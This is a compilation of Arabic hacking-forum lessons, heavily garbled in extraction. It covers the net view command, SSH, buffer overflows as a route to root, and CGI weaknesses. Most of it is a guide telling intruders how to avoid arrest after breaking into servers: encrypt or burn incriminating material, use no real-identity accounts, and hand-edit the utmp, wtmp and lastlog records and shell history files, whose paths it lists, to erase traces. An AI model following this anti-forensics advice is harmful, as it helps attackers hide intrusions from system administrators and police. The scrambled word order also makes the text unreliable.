ألمر التعليمات  .المحدد net تعرضمالحظات

األمر . net view استخدم يكون الكمبيوتر بأجهزة قائمة لعرضلمايلي مشابها  :اإلخراج

Server Name Remark-------------------------------------------------\\Production Production file server

\\Print1 Printer room, first floor\\Print2 Printer room, second floor

أمثلةالكمبيوتر قبل من المشتركة بالموارد قائمة ،Production\\ لمشاهدة

:اكتبnet view \\production

ملقم على المتوفرة الموارد \\ المسمى NetWare لمشاهدةMarketing ، :اكتب

net view /network:nw \\marketingمجموعة أو مجال في الموجودة الكمبيوتر بأجهزة قائمة لمشاهدة

sales عمل ، :اكتبnet view /domain:sales

شبكة في الملقمات كافة NetWare لمشاهدة ، :اكتبnet view /network:nw

11." الـ "secure shellشرح> مصر ابن منتديات من >منقول

>ACID BURN_EG :الكاتب<بركاته و الله رحمه و عليكم : السالم

جداا هامه اداه هى و ورك النت فى اداه الى نتطلع سوف اليومهى االداه هذه و االنترنت على السرفرات معظم تستخدمها

ال Secure Shellال :: SSh اى

عنها الحديث االن لنبدأ :: و

ال هى ؟ SSh ما===============

( secure shellال او ) كمبيوتر الى الدخول و لالتصال برنامج اداه هىهذا داخل معينه مهام او اوامر لتنفيذ ورك النت على اخر جهاز

بعد عن االتصال هو و اى تستخدم remotely connection الجهاز وقوى توثيق تقدم هى و اخر الى كمبيوتر من الملفات نقل فى ايضا

كبديل تعتبر هى و امنه الغير االتصال قنوات فى جداا امن اتصال ويونكسمثل لنفسالغرضفى تستعمل الدوات جداا rlogin,rsh( جيد

and rcp(.ال ايضا تقدم ال secure shell و اتصاالت لشحنات جداا امن اتصال

tcp كونيكشن .

هو :: السؤال و مهم سؤال يأتى هنا :: و

ال استخدام يفضل التى secure shell لماذا االخرى االدوات علىعليها يونكس r- commands يطلق فى

========================================================================================

؟ االعلى فى كالمذكورين======================

ال اليونكسمثل توزيعات يطلق BSD* فى التى االدوات تتعرضمن )rlogin,rsh and rcp( مثل r- commands عليها مختلفه انواع الى

اكسيس روت ال يكتسب ان شخصاستطاع لو انه حيث الهجمات)root access( ن فعلها او ما بطريقه الشبكه على التى لالجهزه

بيانات كل الى يدخل ان يمكنه ريموتلى اى فيزيائى اتصال طريقبالروت يستطيع النه صعوبه ادنى بدون الشبكه على التى االجهزه

اى يونكسبدون فى المذكوره من اداه اى خالل من يعبر اكسسانالشخص بأن يسمى ما هذا و معينه بطرق تفاديها يمكنه و صعوبه

و unauthorized access to systems لديه االن فهمتونى انكم اعتقدكل يلتقط و ترافيك ورك النت و يراقب ان شخص الى ايضا يمكن

على الباكيدجستحتوى هذه تكون و شبكتك خالل الباكيدجسمنشبكتك حق  الباسوردسللسيستم

فى: حقيقيه طريقه هى ترافيك ورك النت مراقبه طريقه ملحوظهبند تحت تقع و الكبرى المنظمات اختراق فى تستخدم و االختراق

لالختراق االعداد و االثر ) تقفى

مع هنا تظهر شيل السيكيور مزايا و شيل السيكيور الى نعود االن والشخص يطالب شيل يونكسفالسيكيور فى االدوات عيوب كل

ال اى عبره موثوق اتصال يتصل بأن اكسسايضا الروت لديه الذىال و بالباسورد اال الشبكه اجهزه بيانات الى للدخول الحق يعطيه

ال على التحايل تمكن sshيمكن لو حتى بذلك و النقطه هذه فىعلى االطالع يستطسع اكسسلن الروت اكتساب الشخصمن

الشبكه  بياناتب . authorized access to systems اال

مراقبه طريق عن اختراقك احد حاول اذا ان هى الثانيه النقطه وتحمل الباكيدجسالتى التقاط و لشبكتك ترافيك وررك النت

يرسل ال شيل السيكيور الن امله فسيخيب باسورداتك و معلوماتكو يونكساالخرى ادوات ترسلها كما واضحه صوره فى الباسوردات

فك محاوله المخترق على سيكون لذلك و مشفره يرسلها لكنالخ و  الشفره

ال يخلى لم المزايا هذه كل مع لكن و secure shell و الثغرات مناكسس الرووت الى يحتاج معظمها تقريبا و قليال ثغراته تعتبر لكن

و ) بينى كالم هذا بها فقط شل السيكيور تخترق ان يمكن االخرى وبينكم(

اخر سؤال االن :: و

ال منها تحمى التى الهجوم انواع هى ؟ ssh ما===========================================

ال -1 من بى ip spoofing تحمى االى عنواين انتحال من تحمى اى

موثوق انه يظهر بى اى باكيدجسمن شخصما ارسل لو انه حيثال يكشفه به ليسموثوق الحقيقه فى لكنه و ايضا ssh به تحمى واى ssh ال المحليه الشبكه على المنتحلين . localy من

ال -2 يسمى مما  DNS spoofing تحمى

الباسوردات -3 عليها مخزن يكون التى التيكستس تعترضظهورالهوستس بيانات و  الواضحه

شخصغير -4 اى تمنع اى المخزنه البيانات معالجه من تحميكمخزنه داتا الى ايديت عمل من به  موثوق

ال فأن هذا كل مع لكن ان ssh و حيث كبيره بدرجه ليسامنال يجعلون ان يستطيعون ورك النت فى كبيره خبره االشخاصذو

ssh اى االتصال عن يكسرو disconnected ينقطع ان يمكن ال لكن وينقلها كان الذى الترافيك تشخيل يعيدون او بياناته . تشفير

كنت اذا فقط تعمل سوف فوق عنها تكلمنا التى االشياء كل ايضا وال بها لك تسمح التى التشفير خاصيه تسمح ssh تستخدم هى و

مثل تشفير نوع من ,three-key triple-DES, DES, RC4-128( بأكثرTSS, Blowfish( اوبشن هناك ايضا و منهم تريد ما استخدام يمكنك

اى التشفير تشغيل بعدم لك تسمح االداه فى خيار encryption "اىof type "none ! ال يجعل هذا الن احمق عليك اقول تجعلنى بهذا وssh الموضوع اول فى ذكرها تم التى االدوات مثل االختراق سهله

ال , يمنع ايضا التشفير هذا ان حيث يونكس ال ip spoofing فى وDNS spoofing التشفير فك مفاتيح تغيير الى باالضافه ايضا هذا و

تماما استعمالها تم التى التدمير مفاتيح تدمير يتم و معينه فتره كل.

ال انها مع االهتمام و االحترام تستحق و مميزه حقا اداه فهى اذنالمجال هذا فى موجود ما افضل لنجعلها لكن و الثغرات من تخلو

مثل اداه على الدرسبالتعرف هذا فى افدتكم قد اكون ان ارجوظنكم حسن عند اكون ان ارجو و شيل .السيكيور

،،،انتهى

الـ " معنى "Buffer Overflows شرح> اإلسالمية الحزم شبكة منتديات من >منقول

>LAMeR :الكاتب<الـ معنى ما درسيشرح لكم وانشالله .. Buffer Overflows اقدم

منه  تستفيدون

نبدأ يله

الدرس :محتويات

الـ -1 هو ؟ Buffer Overflow ما

<--------------------------

)Proccess(المعالجه -2<-----------------

الذاكره -3 )Memory management( إدارة<--------------------------------

4- الـ في ماذكر Buffer Overflow استغالل<----------------------------------

المقالة؟ * هذه أقرأ أن قبل أعرف أن يجب ماذالديك تكون ان تحتاج فقط اذن لك اساسي دليل فهذا الكثير،،، ليس

الذاكرة وإدارة الحاسوب برامج بمفهوم أساسية  معرفة

1- الـ هو ؟Buffer Overflow ما<----------------------->

Buffer Overflow بمعنى أو سيئة برمجة بسبب لبرنامج تحدث حالةأخطاء تحمل برمجة .اخر

نوع من أستغاللها يمكنك ثغرة تسمى Buffer Overflow احدث، 'code red' فايروس خادم في أستغلت MS- لمايكروسوفت IIS التي

web server -يحدث بحجم Buffer Overflow عموما، متغير ما برنامج يظهر عندما

المثال،حجم ) سبيل على ( 20ثابت إلى خصصت التي القيمة و بايت المتغير حجم من أكبر المتغير .هذه

المثال هذا :خذ: " : األول اسمك إطبع رجاء الجملة هذه الشاشة على برنامجي يظهر

وهي" سيدخلها التي البيانات المستخدم من برنامجي سيأخذ ثم ) تخزن) او برنامجي في فتظهر متغير في توضع ثم األول اسمه . بيانات لتخزين مخصص المتغير كان إذا انه في تكمن هنا المشكلة

يساوي األقصى ) 15حجمها اسم وهي هنا والبيانات بايت حجمها( ان ) 25المستخدم لنا يتضح المتغير في ستخزن التي بايت

حجمه ( من اقل مكان في وضع المستخدم .اسمعن الزائدة للبيانات سيحدث ماذا انها 15اذن المؤكد من بايت

تطفح" االسم "Overflow سـ لمتغير خصصت التي الذاكرة .على

الذاكرة تخصص البرنامج، يبدأ : عندما>var1<>var2<>vname<>Other things in memory<

10b 6b 15b )var 1 وvar 2 المدخل باألسم عالقة لها ليست vname, متغيرات

حجمه الذي بايت 15المتغيرالمستخدم سيدخله الذي االسم سيحتوي الذي )وهو

االسم سيدخل المستخدم ان " نفترضabcabcabcabcabcabcabcabcabc" هكذا الذاكره ستبدو :حينها

somevalue2avalusabcabcabc

abcabcabcabcabcabc>var1 <>var2<>vname <>other things go here<

المتغير ؟؟ حدث ماذا البيانات "overflowed طفح" vname اذا بسببقيمة و المستخدم قبل من عليه other things in memory" المدخلة

" فيض بسبب تغيرت الذاكره في اخرى الحروفمن )overflow(أشياءالمستخدم .ادخال

الخطأ؟؟؟ هذا أستغل كيف اذنالمهمة األساسية بعضاألشياء هناك الجواب، إلى نصل أن قبل

الحاسوب وبنية تركيب حول نعرفها أن علينا يجب . التيلينكس سنناقشنظام المقالة هذه linux في ، مماثل المفهوم لكن

األنظمة .لباقي

:)Proccess(المعالجه-2<---------------->

عملية هي يعمل حاسوب في األساسية الوظيفية الوحدة إن.)Proccess( المعالجه العمليات من العديد هنالك الحاسوب في

من العديد تجعل التي القوة تقسيم عن مسؤول التشغيل ونظامالحاسوب في نفسالوقت في تعمل  .العمليات

متعددالعمليات " إسمه شيء صحيح... "Multi- proccesses ليسهناكالمركزية المعالجة وحدة ان اذن؟؛ العمليات )CPU(كيف بين تنتقل

التي المهام من العديد مثل تبدو بحيث كبيره بسرعة حده على كلواحد وقت في ،تعمل

خدع من وهذه واحد وقت في تعمل العمليات كأن لنا تبدو اذاعلينا يؤديها التي  الحاسوب  ..

عمليةآخرى ألي واليمكن ، الذاكره من فاضي عنوان لها عملية كل . الىشي يرشدنا وهذا الذاكرة من الفاضي المكان هذا في تدخل

وهو تفهمه ان يجب :اخر

3- الذاكره :)Memory management( إدارة<------------------------------>

التشغيل أنظمة -operating systems-تدير افتراضية ذاكرة الحديثةvirtual memory)تخيلية(. 

) إلى ) مباشرة الوصول مثال برنامج تطبيق ألي اليمكن بأنه يعني ذلك. لماذا؟؟ الحقيقية الذاكرة

التشغيل تحويل " Operating System انظمة تخطيط جدول تمتلك) ( تخيلية افتراضية عناوين الى الذاكرة من الحقيقية . "العناوينالـ ذاكرة تقوم ( OS وعندما التشغيل )نظام الذاكرة في مكان بتحديد

وليس ، فقط التخيلي العنوان البرنامج ،يأخذ لتشغيله معين لبرنامجالطبيعي .العنوان

) ( من انه وهي التخيلية اإلفتراضية للذاكرة اخر استخدام هنالك وأو ) عملية بكل مباشرة ترتبط ال الحقيقية الذاكرة أن المعلوم

الصلب( القرص على مساحة يستخدم التشغيل فنظام ، برنامج،كذاكرة

الذاكرة ) مكان الذاكرة مكان معرفة أبدا يمكنه ال والتطبيقالصلب ( القرص في للذاكرة المخصصة المساحة ألن ،ذلك الحقيقة

وتتغير .تتبدل

افتراضية :. وذاكرة حقيقة ذاكرة الى تنقسم ال الذاكرة ان توضيحواحد لذاكرة ينتميان أنهما بل

للمتييز هو الجواب ؟؟ وافتراضية حقيقية الى التسمية فائدة ما اذنالقرص من معينة مساحة تمثل الحقيقة الذاكرة ان حيث ، فقط

) حقيقية ) سميت لذلك مستمر تغير في المساحة هذه ومكان الصلبالطبيعية ) الذاكرة لمسمكان بأستطاعتك اي طبيعية اخر بمعنى او

) الصلب القرص على بيدكحقيقي ) غير افتراضي عنوان إعطاء هي اإلفتراضية الذاكرة وفائدة

مساحة( لمكان فقط كأسم عنوان يعطي اي الحقيقية للذاكرة المساحة مكان تغير وإن ، الصلب القرص في الطبيعية الذاكرة

) ( ثابت التخيلي اإلفتراضي العنوان يظل للذاكرة .المخصصة

4- الـ في ماذكر Buffer Overflow استغالل<--------------------------------->

والمرح األهم الجزء إلى نصل  اآلنللوصول الذاكرة وإدارة المعالجة عن قلنا الذي من نستفيد كيف

الجذر الى في )Root( والدخول قلنا نحن تذكر النظام؟ وأختراق ) ( أكبر المستخدم من البيانات اإلدخال يكون عندما بأنه سابق وقت

الزائدة البيانات البيانات، لهذه خصصت التي الذاكرة من حجماالمكان )overflow( ستفيض هذا المتغير؟ االسم بعد التي الذاكرة في

األختراق في منه نستفيد الذي المكان هو الذاكرة .من ) ( : يدخلها التي البيانات مكان خط داخل المكان ذلك في نعمل ماذا

يطلبمن ) الذي األول االسم وهو السابق المثال في المستخدمحيث ( للحاسوب، شعبية األكثر األوامر نضع أدخلناه ثم البرنامج قبل

) ( استخدامه نستطيع هيكل ينتج يحدث الحاسوب تجعل األوامر هذه . بهذا القيام المستغل للنظام الكاملة بالسيطرة للقيام بعد فيما

، يعمل كيف معرفة أردت لو إذن لك، يبدو كما ليسبيسطا العملحول القادمة المقالة تقرأ أن يجب Buffer Overflows أنت ، الذي

الـ من واحده كيفإلستغالل بالضبط في Buffer Overflowsسيصف.اإلختراق

ايشمعنى وعرفتوا الدرسزين فهمتوا انكم اتمنى Buffer اخيراOverflow مع مرة من اكثر قرائته يعيد الدرسنصنص فهم واللي

يفهم وانشالله .التدقيق12.

باإلنترنت CGIالـ ".13 " وعالقتها>منقول<

> قبل من >King_abdo:مترجمالـ بعرضمقدمة نقوم الملفسوف هذا عالقتها CGI في و

باالنترنت

للـ )1( CGI مقدمة

CGI=COMMON GATEWAY INTERFACE تسمح التي الواجهة هيالبرامج أو المتصفح طريق عن المستخدم جانب بين باالتصال

بروتوكول يفهم الذي سيرفر الويب جانب و خالفه )HTTP( و

و TCP/IP الـ أي جي السي سكريبت يستخدمه الذي البروتوكول هوالمحددة . البورت االتصال أثناء السيرفر

هي البروتوكول (80لهذا البورت ) هذه تتغير أن الممكن من

و الويب صفحات بتوليد تقوم أن أي جي السي سكريبتات تستطيعيقوم معينه لمدخالت طبقا محددة نتائج أيضا و الصور

بتحديدها أي جي السي مبرمج

أساسيتين خطوتين علي أي جي السي سكريبتات عمل : يقوم

للبيانات -1 أوليه معالجة بعمل السكريبت يقوم األولى الخطوة فيله أدخلت التي

يقوم -2 التي للبيانات كقناه السكريبت يعمل الثانية الخطوة فيالعكس أو السيرفر الي بارسالها المتصفح

من تتمكن حتي البيانات بتشفير أي جي السي سكريبت يقومللعمل مناخ أي في العمل

لغة كانت سواء برمجة لغة بأي أي جي السي سكريبت كتابة يمكنبيسك الفيجوال مثل مجمعة

أن اللغات نوعين بين الوحيد الفرق و البيرل مثل مترجمة لغة أوالبرنامج

اللغات لكن و التنفيذ في أسرع يكون سوف المجمعة باللغة المبرمجالتطوير عملية في أسرع المترجمة

تطويره أو السكريبت تعديل علي تعمل أن أردت اذا للسكريبت

كالتالي هي لموضوعنا الصله وثيقة تعتبر التي األوامر : أهم

1- GET للمتصفح السيرفر من بيانات بطلب يقوم األمر هذا2- POST المدخلة المعلومات قبول السيرفر من يطلب األمر هذا

المتصفح من اليه3- PUT اليه المرسله المعلومات قبول السيرفر من يطلب األمر هذا

حاليا الموجودة المدخالت عن كبديل

الضعف )2( نقاط

في ليسضعفا أي جي السي سكريبت يسببها التي الضعف نقاطلكنه و نفسه أي جي السي

الـ بروتوكول في المختلفة HTTPضعف التشغيل أنظمة في أوهناك لكن و الموجودة الضعف نقاط باستغالل يسمح أي جي السي

النظام تحطيم الي للوصول أخري طرقباستخدام . محمية الغير الملفات الي الوصول يمكن كمثال األمني

.TELNET أو FTP الـ،،،انتهى

أفعالك؟ " وتخفي نفسك تحمي "!كيف> إعصار منتدى من >منقول

> المدمر: >الكاتببسيطه  : مقدمه

==========كانت سواء اخطائي تحمل منكم ارجو شئ كل قبل و البدايه في

الجميع .. على الفائده تعميم هو له اسعى ما كل امالئيه او  نحويهالي المكانات و المستويات باعل نترقي و العرب نحن نتقدم ان و

 .. نستحقهاتكون .. ان ارجو القراءه في ليسبسهل و ليسصغير الموضوع

الموضوع اخر حتى متانيا  صبورالظلك .. الفحساب تعمل و خيالك من تخاف سيجعلك الموضوع هذا

تتراجع و تخاف ليسالن و لالمام دفعه سيكون انشاله  لكنكل .. .. .. اخر بمعنى دائما نتجنبه ما عادة و غريب الموضوع اسلوب

اختراق في شروحا و دروسا كتبوا من اساتذتنا و اخواننا منمسح هو الحمايه في الوحيد همهم كان المواقع و السيرفرات

! .. log files اللوق سيمنع هذا هل ؟ تام امان في يجعلك هذا هل لكن !! الموضوع قراءة من االنتهاء بعد ستكتشفه ما هذا ؟ اثرك  .. تتبع

************************الثغرات ترجمة على الحصول ان تظن كنت باسرع ) exploites ( اذا

لك " اقول بان لي فاسمح متطورا و محترفا يجعلك ما هو يمكن ماغلط تفكيرك اسلوب ان و خاطئ انسان  " انك

جدا الحديثه الثغره ستفيدك اذا ) 0day ( ماذا القبضعليك يتم عندماعلى .. السيطره سيتم عندها و ؟ الكبيره السيرفرات احدى هاجمت

؟ ! مراقبتك و ادواتك و !اجهزتكان او ؟ شخصنعرفه قطالي بحدث لم هذا البعضان يرى يمكن

ما !! يوم يحدث قد هذا لكن العاليه التقنيات هذه ليسفيها  !! بالدنااخرى سيرفرات انما بلدك سيرفرات فقط التهاجم انت ايضا و

الحرصو .. من البد انه كما الدوليه الشرطه قبل من محميه عالميههكر نفسك تسمي ان تريد كنت اذا االمور بمعنى hacker فهم

 الكلمهالنك بكثيير الموضوع هذا قراءة من اكبر انك نفسك في تعتقد ربمالكن .. نفسك في ذلك ترى انك او باالحتراف عنهم المعروفين من

النهايه الي الموضوع لقراءة تحتاج انت و مخطئ بانك لك اؤكد  انا************************

الى مقسم اجزاء 8الموضوع : =================

قرائته : ) من باالنتهاء انت قمت ماقد هو و المقدمه االول الجزء حاليا (

تصبح : كيف و العقليه االمور الثاني الجزء " Paranoid "** الجزء هذاالمواضيع هذه خالل من عرضه  : سيتمالحافز - او  الدافع

تصبح - ان البد ان  " Paraniod " لماذاتصبح - ان يمكن  ؟ " Paranoid " كيف

؟ - الجديده شخصيتك او الجديد اسلوبك على تحافظ كيف !و

توضيح .. ** سيتم الكلمه هذه معنى عن يتسائل معظمكم ان متاكدانشاله الجزء هذا شرح مع مفهومها و . معناها

تقوم : ان قبل معرفتها عليك يجب التي االساسيات الثالث الجزءالتاليه ) ( النقاط خالل من عرضها سيتم و اختراق عملية  باي

 تمهيد -نفسك -  امن

الخاص -  حسابكاللوق - LoGs ملفات

اثر - اي تترك  المنها - الحظر و تجنبها يجب اشياء و  امور

سيتم : ) و مالحظتها يجب يتي الي الحديثه التقنيات الرابع الجزءالتاليه ( النقاط خالل من  عرضه

 تمهيد -نوع - اي من اثرك تقفى  امنع

اللوق - ملفات انواع من نوع اي من lOGs ايجاد فيها كان مهما .. تالعب

من - syslog configuration and logfile تحققالمثبته - االمن برامج نوعيات من  تحقق

المدراء - وجود من Admins تحققتصحيح - يمكن  checksum checking software كيف

االمنيه - المستخدم  حيل

المراقبه : تحت وضعت ان تفعل ماذا الخامس  الجزءعدم : من البد الذي ايضا و به القيام عليك الذي ما السادس الجزء

القبضعليك تم انه حالة في به  القياماالختباء : و للتخفي البرامج بافضل قائمه السابع  الجزء

بحرضو : ........ الموضوع تتابعو ان ارجو ختاميه كلمه الثامن الجزءاالن من شديدن !!! ... تركيز

************************الثاني  : الجز

=======الحافز - و  : الدافع

*************التي .. القوه هو العقل عمل اي في للنجاح العقل تحكيم من البد

حريص .. و مسئول واقعي انسان لتصبح تحفزك و ستدفعكو ) Hacker ( المخترق المبادىء هذه فيه تتوفر ان و البد الناجح

الجسم .. يكبر لن الجسم عضالت بناء مثل مثلها العقليه االمكانياتسبيل ) على بذلك الخاصه الرياضه ممارسة بعد اال يتقسم و

 المثال (اشد اخذ البد المعلومات من الكثيير لديك او متمرس كنت مهما

شئ باي القيام قبل الحذر و االحتياطات

تصبح - ان يجب ؟ " Paranoid " لماذا***************************

نزعه ) " Paranoia " كلمة االرتياب جنون تعني االنجليزيه اللغه فياالشخاص ( جميع و االمور جميع في تشك تجعلك االفراد  عند

الكلمه هذه اصل معرفة بعد لنا تتضح بدات االمور  .. اعتقدانالتاليه الكلمات خالل من ذكر نلخضما ان ان paraniod : يمكن تعني

الظروف جميع في الشك و الحذر شديد تصبح

؟ المخيفه الطريقه بهذه الحذر توخي يجب  !!لماذاالن .. و امان في تسير يجعلك الظروف اسوء الى دائما توقعك الن

تغير .. انك المجرده بعينك انت تراه ما جدا كبيير شئ هو تفعله ماالسيرفر .. من المعلومات بعض بتحميل تقوم او الرئيسيه الصفحه

جدا سهل و بل بسيط شئ هوالقبض و تتبعك و رصدك تم و معين سيرفر اخترقت انك لو ماذا

! و ! كالسارقين السجن في سترمى انك و ؟ الشرطه قبل من عليكالمجرمين

يصيب .. قد ما بما االهتمام عليك لك يحصل قد بما تهتم ال كنت انمتزوج .. ... .. .. ) ( كنت ان اطفالك و زوجتك اخوتك امك ابوك  اهلك

هي .. الحقيقه في لكن جريمه هو به ماتقوم بان التشعر ربما!! جريمه

؟ القبضعليك تم ان سينتظرك ماذا تعرف !هلطبيعيه .. الغيير الناس نظرة الكومبيوتر امور كل من حرمانك سيتم

بفرص ) ( .. تحظى لن خوف نظرة انما اعجاب نظرة ليست لكمن .. اخرى مشاكل اي حصول عند ستسدعى تستحقها التي العمل

ابدا .. ثاني يقومون ال يسقطون من معظم فان لذا النوع  !! هذا

نفسك .. امن شكاكا و جدا حذرا فاصبح لذااالحتياطات جميع  اخذ

شابه ما او خواف بانك عنك الكثيرون قديقوله بما التهتمملف باي تافهه log اهتم قيمته كانت  مهما

سليما .. hacker لتصبح بعملك تقوم ان 100عليك %

تصبح - ؟ " Paranoid " كيف*********************

الشخص هذا اصبحت بالفعل انت به اقتنعت و سبق ما قرأت كنت اذا" Paranoid " وليد التحمسوحده و يكفي ال وحده االقتناع لكن

موجودين ... التوتر و القلق يكون ان البد انما اليكفي ايضا اللحظهااللكترونيه ) ( حياتك في دائم  بشكل

تقول ... لمن تعرف ان البد حقيقي هكر تكون ان تريد فعال كنت اذامراقب .. انك حساب اعمل االخرين مع تتعامل كيف و الحقيقه هذه

على .. كالمك في فاحذر دائما وراك خفيه كاميرا هناك انه و دائماو .. الشخصي بريديك حتى او مراقب يكون قد النه الهاتف

المتوقع ) ( الغير حساب تعمل ان البد  االلكتروني

هذه .. اسألك دعني مبالي غير انسان انك و يهمك ال ذكرته قد ما اذا؟  االسئله

الدموع و الحزن ترى ان تريد هل ؟ مجرم االخرين يراك ان تريد هل؟ عليك قلوبهم تحسر ان تريد هل ؟ اهلك وجه  !على

؟ صحبتك ؟ خطيبتك ؟ اصدقائك تفقد ان تريد  هلتعرفه من كل على سيعود انما فقط عليك يعود لن الضرر ان  تذكر

؟ - الجديده شخصيتك او الجديد اسلوبك على تحافظ كيف !و******************************************

انسان تكون ان قررت و االن حتى ماذكر استوعبت قد انك بماالوقت .. طوال هكذا تبقى ان البد  حريصجدا

االحتياطات : اتخاذ في واحده كسل لحظة الكلمات هذه تذكر و؟ باكملها حياتك تغير قد  !!!!االمنيه

الدافع تذكر  دائما

الثالث - : الجزء=========

تمهيد -****** 

اي ممارسة قبل جيدا استيعابها و القادمه االمور هذه معرفة يجبتستوعب .. ان متمرسالبد مخترق كنت لو حتى اختراق عملية

القادمه  االفكار

نفسك -  : امن***********

ال - قرأ لو ؟ SysAdmin ماذا االلكترونيه البريديه  رسائلكقبل - من مراقبه و مسجله الهاتفيه اتصاالتك كانت لو ماذا

؟  الشرطهكل - على السيطره و الشخصي الكومبيوتر ضبط تم لو ماذا

؟  معلوماتك

الهاكرز ايشخصمن مع هاتفيه اتصاالت اي بعمل التقوم كنت اذاتمتلك .. ال و مشبوهه معلومات فيه ايميالت اي تبعث وال الكراكرز او

اي يشكل ال ببساطه فهذا جهازك على حساسه و امنيه معلومات اياو مخترق لست انت ايضا ببساطه النه )= hacker خوف

بهذا المهتمين اصدقائك بين و بينك اتصال وجود من البد النهاالفكار .. و االخبار لتبادل  .. المجال

بعض او لالختراق الالزمه الملفات بعض تمتلك انك و البد انه كمالجهازك رصد حدوث حالة في لك مدينه تعبر الي المعلومات

كبسه) (  >----<

حساسه معلومات من تملكه ما كل بتشفير  sensitive data قماالنترنت .. على مجانا الموجوده البرامج بعض باستخدام ذلك يمكنك

االول الهاكرز اختيار تعتبر التي و البرامج بافضل قائمه هذه  : وSecureDrive 1.4b او SFS v.17 اليكم MsDos لمستخدمين -

نظام - انظمة * ( EnigmaII v1.5 اليكم *Amiga لمستخدمين احدىالعربي عالمنا في خصوصا االستخدام شائعة غير  ) التشغيلال - انظمة CFS v1.33 اليكم Unix لمستخدمين

البرامج ) ( هذه اليكم بملف ملف فردي بشكل الملفات لتشفيراداء) ( االحسن و شهره االكثر :

- Triple DES- IDEA

- Blowfish )32 rounds(- file2file

االيميالت  : لتشفير- PGP v2.6.x 

اتصالكب عملية تشفير ايضا انه ( Unix System يمكنك اساس علىمراقب تكون ان  ) ممكن

باستخدام ذلك  : و- SSH االن حتى  االمن

- DES Login ال .. .. .. شائعه غير منطقيه غير التخمين صعبة السريه كلماتك اجعل

دائما .. تتذكرها ان البد نفسالوقت في لكن القواميس في توجداالحرف .. من ممكن عدد اكبر اجعلها تتمتلكه كتاب من اخترها

من) تتكون سريه كلمه منك يطلب اشتراك اي عمل عند عادة يعني ال ( 8 -4 فاختر حروف 8احرف

يمكنك .. انما اعتيادي بشكل الهاكرز اصحابك هواتف ارقام تحفظ المن ) ( بهم اتصل و فقط انت تفهمها برموز حتى تشفرها بان

العمل من او الشارع  .. هواتفكلشئ تشفير من فالبد الهاكينج في جدا متعمق بالفعل انت اذا

االمور بهذه !! يتعلقعلى معلوماتك من احتياطيه نسخه دائما بالطبع HD او CD احفظ و

جهازك على الموجوده المعلومات خسرت اذا حتى مشفره تكوناحتياطيه نسخ لديك  يكون

لديك .. كان ان و التحتاجها بملفات او document files التحتفظانما اعتياديا التقطعها اخرى مرة تريدها ال و مطبوعه ملفات

ان او االعتياديه تواجدك اماكن عن البعد كل بعيد مكان في احرقهامشفر او مرمز باسلوب جديد من كتابتها فعليك بها االحتفاظ اردت

انت اال !! اليعرفه

ان الممكن من انه تعرف  : هل=================

انهم : , , و اخرون هاكرز المخابرات الشرطه من مراقب تكونتخيلها اليمكن حديثه وسائل باستخدام حركات كل رصد  يتسطيعون

 : مثلاالمتار - مئات بعد عند تصويرك تستطيع تصوير  اجهزه

مكالماتك - على للتصنت غرفتك نحو مصوبه ليزر  نقطةال - على يديك صوت و لمسات على للتنصت التردد عالية موجات

keyborad !!اخرى .. الى دوله من و الخر مكان من االمكانيات هذه بالطبع تختلف

يخبئ !!! ماذا تعرف ال انت لكن مبالغه اقوله فيما انه البعض يرى واالن !! من التستعد فلماذا المستقبل  !!! لك

بالفعل الذي الخارج دول في العرب اخواننا من الكثيير هناك انه كماالمصري ... " المثل راي على و هذه التنصت اجهزة فيها تتوفر

حركاتك " و احتياطيا كنت فكلما فيك عدوك يحتار عدل امشيجدا !!! قليله ففرصاطاحتك صحيح بشكل  تحسبها

الشخصيه اشتراكات و  : حساباتك===================

\ \ المدرسه العمل في كانت سواء الشخصيه حساباتك عن سأتكلم هنابالتالي\ فعليك كان اي  : الجامعه

الشخصيه .. - بحسابتك مشبوه او قانوني غيير عمل باي تقوم ال ابداعنك كامله تفصيالت و هويتك و الحقيقي اسمك يكون فيها  التي

ال - بواسطة اختراقه تم قد بموقع تتصل ان تحاول ما  telnet عمركامني - موقع الي البريد قائمة الخاصفي بحسابك االشتراك يمكنك

security خوف دون  .. من

انها - او تشفر ان البد ملفات من بالهاكينج مختص هو مو كل لكنفورا مسحها  يتم

في - الهارديسك على االختراق ادوات و برامج اي تحفظ ال ابداالشخصي حسابك

عمياء - ثقه فيه تثق لمن اال التعطيه الحقيقي !!!! بريدكبعكس .. - االهتمام انما مشبوها يجعلك ال بالسكيورتي اهتمامك

الهاكينج ==< المشكله هو السكيورتي

>----اللوق  : LoGS ملفات

============جدا 3هناك مهمه ملفات : 

- WTMP الخروج و الدخول عند log on/off - log in/logout ( للتسجيل+ tty + host ( 

- UTMP حاليا اونالين ! للمتواجدين- LASTLOG هذه جاءت اين من  logins تسجيل

من ) ** اخر جزء في بعد فيما تعمق و باستفاضه عنهم سنتكلم نفسالموضوع (

ال بواسطة دخول عملية في telnet , ftp , rlogin كل تسجيلها يتمسيتم .. اال و الملفات هذه من دخولك حذف البد الملفات هذه

االتي  : معرفةباالختراق - قمت  !! ماذاقادم - انت مكان اي  من

اونالين - بقيت الوقت من .. كم

بنسبة الجميع فيه يقع نفس % ) 99.9خطا في اقع كنت انا حتى مننا اللوقات .. ( تمسح انك هو و اتعلمت لكن زمان الخطا  logfiles هذا

انه .. االدمين يعرف بان التهتم انك حالة في مجدي هذا علطولشغل .. تشتغل ان اردت اذا اما النظام على دخل قد ما مخترق هناك

ايشخص .. يالحظك ان دون الخروج و الدخول عليك المحترفينالنظام مدير انتباه يلفت شئ اي بتغيير تقوم ان  دون

معي تابع ذلك لعمل  : وتقوم انما اللوق بمسح التقوم انها على روجت التي البرامج التعتمد

برنامج مثل مجديه غيير فهي دخولك ZAP )or ZAP2 بحذفعلى دليل ايضا هذا و انت مكانك لوق كاخر اصفار بعمل يقوم النه

النظام مدير سيالحظه خطا  وجوديدويا بذلك بالقيام عليك  .. اذا

تكوت ان البد ال root عادة في تعدل و باستثناء ( log files لتغيرجدا القديمه التوزيعات  ) بعض

اللوق ملفات تواجد التوزيع ( default اماكن باختالف  ) تختلفUTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/logWTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log

LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/logالقديمه النسخ بعض في $home/.lastlog و

اثرا تترك : ال=======

ملفات من دخولهم حذف عملية في ينجحون الهاكرز من كثيير

توجد .. !!! التي الملفات هي و قاتال و هاما امرا ينسون لكنهم اللوقهنا

/tmp and $HOMEال جود كبيير $HOME في Shell History و قلق : مصدر

History files :sh : .sh_history

csh : .historyksh : .sh_history

bash: .bash_historyzsh : .history

